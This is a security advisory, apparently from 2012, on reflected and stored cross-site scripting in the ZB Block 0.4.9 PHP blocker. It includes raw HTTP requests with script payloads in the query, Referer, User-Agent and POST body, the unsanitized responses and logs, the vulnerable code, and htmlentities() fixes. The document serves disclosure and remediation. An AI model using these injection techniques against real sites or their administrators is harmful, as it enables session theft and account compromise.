ZB Block Cross Site Scripting

`--------------------------------------------------------------------------------------------------------------------  
Vulnerable Software:  
// ZAPHOD BREEBLEBROX'S BLOCKER A.K.A. ZB BLOCK  
// VERSION 0.4.9 Final "Jaguar"  
0.4.9_Final  
Developed by HTTP://WWW.SPAMBOTSECURITY.COM  
--------------------------------------------------------------------------------------------------------------------  
Severity: *Low*  
--------------------------------------------------------------------------------------------------------------------  
Vulnerability Description: XSS-(CROSS SITE SCRIPTING VULNERABILITIES)  
--------------------------------------------------------------------------------------------------------------------  
Founded by: AkaStep  
-------------------------------------------------------------------------------------------------------------------  
Description:  
ZB Block is distributed under the GNU/GPL Version 2 License.  
It's main goal:  
Act as "Honeypot" on your site and block intrusions.  
For more info:  
SPAMBOTSECURITY.COM  
-------------------------------------------------------------------------------------------------------------------  
Vulnerability Desc:  
Due "trust" to HTTP_USER_AGENT and HTTP_REFERER  
ZB Block is vulnerable to non-persistent cross site scripting vulnerability.  
However it also logs attacks so unsanitized thus variables will be writen to killed_logs.txt  
which on "future" may act as Persistent Cross Site Scripting Vulnerability against admin.  
-------------------------------------------------------------------------------------------------------------------  
  
  
Proof of Concept:  
====================Triggering Attack Against Site which is protected using ZB Block========================  
cmd> GET /myfiles/10/zbblock/hackme.php?id=<script>alert("Is it safe?");</script> HTTP/1.0  
cmd> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*  
cmd> Referer: http://microshit.attacks/you?id=<script>alert("Pwn using Referer");</script>  
cmd> User-Agent: <script>alert("Pwn Using user Agent");</script>  
cmd> Host: 192.168.0.15  
cmd>  
hdr> HTTP/1.1 403 FORBIDDEN  
hdr> Date: Mon, 05 Mar 2012 13:36:51 GMT  
hdr> Server: Apache  
hdr> Status: 403 FORBIDDEN  
hdr> Warning: 199 192.168.0.15:80 You_are_abusive/hacking/spamming_192.168.0.15  
hdr> Abuse: Your connection is not welcome due to: http javascript (wedge end/script start) injection. XSS attack obfuscation. http javascript (wedge end/script start) injection. http javascript (wedge start/script end) injection. http javascript (wedge end/script start) injection. http javascript (wedge start/script end) injection.  
hdr> Content-Length: 3890  
hdr> Content-Type: text/html  
RequestDone Error = 0  
StatusCode = 403  
================= END OF REQUEST ======================================  
  
Responce:(Take a look it doesn't touches HTTP_REFERER and HTTP_USER_AGENT( and it is same as "original" - without any sanitization)  
--------------------------------------------------- SNIPPET GOES -------------------------------------------------------  
<strong><font color="#0000FF">Record #:</font></strong> 1<br>  
<strong><font color="#0000FF">Time:</font></strong> Mon, 05 Mar 2012 13:36:51 +0000<br>  
<strong><font color="#0000FF">Running:</font></strong> 0.4.9_Final<br>  
<strong><font color="#0000FF">Host:</font></strong> labmachine.mshome.net<br>  
<strong><font color="#0000FF">IP:</font></strong> 192.168.0.1<br>  
<strong><font color="#0000FF">Post:</font></strong> <br>  
<strong><font color="#0000FF">Query:</font></strong> id=<script>alert("Is<br>  
<strong><font color="#0000FF">Stripped Query:</font></strong> id=<script>alert("is<br>  
<strong><font color="#0000FF">Referer:</font></strong> http://microshit.attacks/you?id=<script>alert("pwn using referer");</script><br>  
<strong><font color="#0000FF">User Agent:</font></strong> <script>alert("Pwn Using user Agent");</script><br>  
<strong><font color="#0000FF">Reconstructed URL:</font></strong> http:// 192.168.0.15 /myfiles/10/zbblock/hackme.php?id=<script>alert("Is<br>  
<br>&nbsp;&nbsp;&nbsp;&nbsp;Generated by <a href="http://www.spambotsecurity.com/zbblock.php" >ZB Block 0.4.9_Final</a></p>  
</body>  
</html>  
--------------------------------------------------- END OF SNIPPET -------------------------------------------------------  
  
  
Print Screen:  
  
http://i009.radikal.ru/1203/71/7d0fd71f5c5d.png  
  
  
  
/*----------------------------------------------VULNERABLE CODE--------------------------------------------------------------*/  
//zbblock.php  
// LINE NO 455 && 459  
  
if(isset($_SERVER['HTTP_REFERER'])){$fromhost2=@$_SERVER['HTTP_REFERER'];}  
$fromhost=strtolower($fromhost2);  
$fromhostsws=preg_replace('/\s+/','',$fromhost);  
$fromhostsws=preg_replace("/[^\x9\xA\xD\x20-\x7F]/",'',$fromhostsws);  
if(isset($_SERVER['HTTP_USER_AGENT'])){$useragent=@$_SERVER['HTTP_USER_AGENT'];}  
$lcuseragent=strtolower($useragent);  
$lcuseragentsws=preg_replace('/\s+/','',$lcuseragent);  
$lcuseragentsws=preg_replace("/[^\x9\xA\xD\x20-\x7F]/",'',$lcuseragentsws);  
/*------------------------------------- END OF VULNERABLE CODE -------------------------------------------------------*/  
  
Defaulty this script writes log file:  
filename: killed_log.txt  
Exist in: {zbblockWHERE_INSTALLED}/vault/killed_log.txt  
Which is not readable from HTTP (because access to that area protected using .htaccess (Deny from all)  
  
Ok,lets see it's content after triggering attack:  
  
  
-----------------------------------------------------------------------------------------------------------------------------------------  
# cat -n killed_log.txt|less  
1 <?php die(''); ?>  
2  
3 #: 1 @: Mon, 05 Mar 2012 13:36:09 +0000 Running: 0.4.9_Final  
4 Host: labmachine.mshome.net  
5 IP: 192.168.0.1  
6 Score: 6  
7 Violation count: 0  
8 Why blocked: http javascript (wedge end/script start) injection. XSS attack obfuscation. http javascript (wedge end/script  
start) injection. http javascript (wedge start/script end) injection. http javascript (wedge end/script start) injection. http ja  
vascript (wedge start/script end) injection.  
9 Query: id=<ScRiPt>AlErT("Not  
10 Referer: http://microshit.attacks/you?id=<script>alert("pwn using referer");</script>  
11 User Agent: <script>alert("Pwn Using user Agent");</script>  
12 Reconstructed URL: http:// 192.168.0.15 /myfiles/10/zbblock/hackme.php?id=<ScRiPt>AlErT("Not  
13  
14 #: 1 @: Mon, 05 Mar 2012 13:36:51 +0000 Running: 0.4.9_Final  
15 Host: labmachine.mshome.net  
16 IP: 192.168.0.1  
17 Score: 6  
18 Violation count: 1  
19 Why blocked: http javascript (wedge end/script start) injection. XSS attack obfuscation. http javascript (wedge end/script  
start) injection. http javascript (wedge start/script end) injection. http javascript (wedge end/script start) injection. http ja  
vascript (wedge start/script end) injection.  
20 Query: id=<script>alert("Is  
21 Referer: http://microshit.attacks/you?id=<script>alert("pwn using referer");</script>  
22 User Agent: <script>alert("Pwn Using user Agent");</script>  
23 Reconstructed URL: http:// 192.168.0.15 /myfiles/10/zbblock/hackme.php?id=<script>alert("Is  
24  
------------------------------------------------------------------------------------------------------------------------------------------------  
  
  
As you can see:  
10 Referer: http://microshit.attacks/you?id=<script>alert("pwn using referer");</script>  
11 User Agent: <script>alert("Pwn Using user Agent");</script>  
21 Referer: http://microshit.attacks/you?id=<script>alert("pwn using referer");</script>  
22 User Agent: <script>alert("Pwn Using user Agent");</script>  
  
Same as original.In future which may cause problems for site administrator.  
Can't because .txt file and protected using .htaccess ? :)  
This gives to us a bit advantage to catch site admin and automatically exploitate our XSS attack.  
Theris a chance admin will read that file using some "reader script" and admin believes that killed_log.txt is safe)  
In ex:  
  
----------------------------------------------------------------------------------------------------------------------------------------------  
<?php  
  
echo '<pre>' .  
file_get_contents('./vault/killed_log.txt') . '</pre>';  
  
?>  
----------------------------------------------------------------------------------------------------------------------------------------------  
  
  
So, theris a chance to execute our javascript(html) in context of admin's browser.  
  
  
Fix so simple:  
ZB BLOCK Developer(s) should note that HTTP_USER_AGENT AND HTTP_REFERER isn't "trust"-able and may be spoofed  
or injected easily.  
So htmlentities() or strip_tags() our best friends in this case :)  
------------------------------------------------- FIX 1---------------------------------------------------------------------------------------  
//zbblock.php  
//LINE NO 455  
if(isset($_SERVER['HTTP_REFERER'])){$fromhost2=htmlentities(@$_SERVER['HTTP_REFERER']);}  
//LINE NO 459  
if(isset($_SERVER['HTTP_USER_AGENT'])){$useragent=htmlentities(@$_SERVER['HTTP_USER_AGENT']);}  
// END OF  
-----------------------------------------------------------------------------------------------------------------------------------------------  
  
  
Also here is another non-persistent XSS while detecting POST request intrusion attempt.  
  
--------------------------------------------- POST METHOD--------------------------------------------------------------------------------------  
cmd> POST /myfiles/10/zbblock/hackme.php HTTP/1.0  
cmd> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*  
cmd> Referer: http://192.168.0.15/myfiles/10/zbblock/hackme.php  
cmd> Content-Type: application/x-www-form-urlencoded  
cmd> Host: 192.168.0.15  
cmd> Content-Length: 58  
cmd>  
hdr> HTTP/1.1 403 FORBIDDEN  
hdr> Date: Mon, 05 Mar 2012 17:53:01 GMT  
hdr> Server: Apache  
hdr> Status: 403 FORBIDDEN  
hdr> Warning: 199 192.168.0.15:80 You_are_abusive/hacking/spamming_192.168.0.15  
hdr> Abuse: Your connection is not welcome due to: POST JS POST-058. POST JS POST-059.  
hdr> Content-Length: 3548  
hdr> Content-Type: text/html  
RequestDone Error = 0  
StatusCode = 403  
POSTDATA: f=<script>alert("Pwned");</script>&fupl=G%F6nd%26%23601%3Br%21  
// Take a look our payload is not in urlencoded //  
-------------------------------------------------------------------------------------------------------------------------------------------------  
Responce:  
----------------------- SNIPPET -------------------------------------------------------------------------------------  
<strong><font color="#0000FF">Post:</font></strong> f=<script>alert("Pwned");</script>&fupl=G%F6nd%26%23601%3Br%21<br>  
  
----------------------- END OF SNIPPET -------------------------------------------------------------------------------------  
  
-------------------------------------------------------------------------------------------------------------------------------------------------  
  
So why this occurs?  
  
Again we are going to look our code:  
------------------------------------------ VULNERABLE CODE -------------------------------------------------------------  
//zbblock.php  
// Line: no: 856  
<strong><font color="#0000FF">Post:</font></strong> ' . $rawpost . '<br>  
//  
------------------------------------------------------------------------------------------------------------------------  
  
  
//And if we'll look to up line no: 472  
$rawpost=file_get_contents("php://input");  
  
//No sanitization again  
// I think  
/*--------------------------- SINCE POST DATA content is not logging to killed_logs.txt  
and it is only for print to client side we can use on line 855  
  
  
<strong><font color="#0000FF">Post:</font></strong> ' . htmlentities($rawpost) . '<br>  
  
  
This also applies to line no: 838  
  
$dummy = $ini['e_mail'] . '?subject=Event ID:#' . $zbcounter . ' on ' . $thishost . '&body=' . htmlentities($dummy);  
  
---------------------------------------------------------- EOF --------------------------------------------------------------------------------*/  
  
  
  
/AkaStep ^_^  
  
  
  
1330959272  
  
  
  
  
  
  
  
  
  
  
`